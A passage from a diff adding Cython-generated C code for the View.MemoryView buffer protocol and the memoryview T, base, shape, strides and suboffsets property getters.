"View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesvalue); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t *__pyx_t_3; + char *__pyx_t_4; + void *__pyx_t_5; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + __pyx_t_2 = ((__pyx_v_flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_L4_bool_binop_done:; + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":524 + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + * raise ValueError, "Cannot create writable memory view from read-only memoryview" # <<<<<<<<<<<<<< + * + * if flags & PyBUF_ND: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Cannot_create_writable_memory_vi, 0, 0); + __PYX_ERR(1, 524, __pyx_L1_error) + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + } + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_ND) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":527 + * + * if flags & PyBUF_ND: + * info.shape = self.view.shape # <<<<<<<<<<<<<< + * else: + * info.shape = NULL + */ + __pyx_t_3 = __pyx_v_self->view.shape; + __pyx_v_info->shape = __pyx_t_3; + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":529 + * info.shape = self.view.shape + * else: + * info.shape = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + /*else*/ { + __pyx_v_info->shape = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":532 + * + * if flags & PyBUF_STRIDES: + * info.strides = self.view.strides # <<<<<<<<<<<<<< + * else: + * info.strides = NULL + */ + __pyx_t_3 = __pyx_v_self->view.strides; + __pyx_v_info->strides = __pyx_t_3; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + goto __pyx_L7; + } + + /* "View.MemoryView":534 + * info.strides = self.view.strides + * else: + * info.strides = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_INDIRECT: + */ + /*else*/ { + __pyx_v_info->strides = NULL; + } + __pyx_L7:; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_INDIRECT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":537 + * + * if flags & PyBUF_INDIRECT: + * info.suboffsets = self.view.suboffsets # <<<<<<<<<<<<<< + * else: + * info.suboffsets = NULL + */ + __pyx_t_3 = __pyx_v_self->view.suboffsets; + __pyx_v_info->suboffsets = __pyx_t_3; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":539 + * info.suboffsets = self.view.suboffsets + * else: + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + /*else*/ { + __pyx_v_info->suboffsets = NULL; + } + __pyx_L8:; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":542 + * + * if flags & PyBUF_FORMAT: + * info.format = self.view.format # <<<<<<<<<<<<<< + * else: + * info.format = NULL + */ + __pyx_t_4 = __pyx_v_self->view.format; + __pyx_v_info->format = __pyx_t_4; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":544 + * info.format = self.view.format + * else: + * info.format = NULL # <<<<<<<<<<<<<< + * + * info.buf = self.view.buf + */ + /*else*/ { + __pyx_v_info->format = NULL; + } + __pyx_L9:; + + /* "View.MemoryView":546 + * info.format = NULL + * + * info.buf = self.view.buf # <<<<<<<<<<<<<< + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + */ + __pyx_t_5 = __pyx_v_self->view.buf; + __pyx_v_info->buf = __pyx_t_5; + + /* "View.MemoryView":547 + * + * info.buf = self.view.buf + * info.ndim = self.view.ndim # <<<<<<<<<<<<<< + * info.itemsize = self.view.itemsize + * info.len = self.view.len + */ + __pyx_t_6 = __pyx_v_self->view.ndim; + __pyx_v_info->ndim = __pyx_t_6; + + /* "View.MemoryView":548 + * info.buf = self.view.buf + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize # <<<<<<<<<<<<<< + * info.len = self.view.len + * info.readonly = self.view.readonly + */ + __pyx_t_7 = __pyx_v_self->view.itemsize; + __pyx_v_info->itemsize = __pyx_t_7; + + /* "View.MemoryView":549 + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + * info.len = self.view.len # <<<<<<<<<<<<<< + * info.readonly = self.view.readonly + * info.obj = self + */ + __pyx_t_7 = __pyx_v_self->view.len; + __pyx_v_info->len = __pyx_t_7; + + /* "View.MemoryView":550 + * info.itemsize = self.view.itemsize + * info.len = self.view.len + * info.readonly = self.view.readonly # <<<<<<<<<<<<<< + * info.obj = self + * + */ + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_v_info->readonly = __pyx_t_1; + + /* "View.MemoryView":551 + * info.len = self.view.len + * info.readonly = self.view.readonly + * info.obj = self # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject *)__pyx_v_self); + + /* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":556 + * @property + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) # <<<<<<<<<<<<<< + * transpose_memslice(&result.from_slice) + * return result + */ + __pyx_t_1 = __pyx_memoryview_copy_object(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 556, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_memoryviewslice_type))))) __PYX_ERR(1, 556, __pyx_L1_error) + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":557 + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_t_2 = __pyx_memslice_transpose((&__pyx_v_result->from_slice)); if (unlikely(__pyx_t_2 == ((int)-1))) __PYX_ERR(1, 557, __pyx_L1_error) + + /* "View.MemoryView":558 + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) + * return result # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.T.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":562 + * @property + * def base(self): + * return self._get_base() # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->_get_base(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 562, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.base.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":565 + * + * cdef _get_base(self): + * return self.obj # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->obj); + __pyx_r = __pyx_v_self->obj; + goto __pyx_L0; + + /* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_7genexpr__pyx_v_length; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":569 + * @property + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_7genexpr__pyx_v_length = (__pyx_t_2[0]); + __pyx_t_5 = PyInt_FromSsize_t(__pyx_7genexpr__pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_5))) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + } /* exit inner scope */ + __pyx_t_5 = PyList_AsTuple(((PyObject*)__pyx_t_1)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_5; + __pyx_t_5 = 0; + goto __pyx_L0; + + /* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.shape.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr1__pyx_v_stride; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + __pyx_t_1 = (__pyx_v_self->view.strides == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":575 + * if self.view.strides == NULL: + * + * raise ValueError, "Buffer view does not expose strides" # <<<<<<<<<<<<<< + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Buffer_view_does_not_expose_stri, 0, 0); + __PYX_ERR(1, 575, __pyx_L1_error) + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + } + + /* "View.MemoryView":577 + * raise ValueError, "Buffer view does not expose strides" + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.strides + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.strides; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr1__pyx_v_stride = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr1__pyx_v_stride); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.strides.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr2__pyx_v_suboffset; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + __pyx_t_1 = (__pyx_v_self->view.suboffsets == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PySequence_Multiply(__pyx_tuple__4, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 582, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + } + + /* "View.MemoryView":584 + * return (-1,) * self.view.ndim + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.suboffsets + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.suboffsets; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr2__pyx_v_suboffset = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr2__pyx_v_suboffset); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.suboffsets.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # 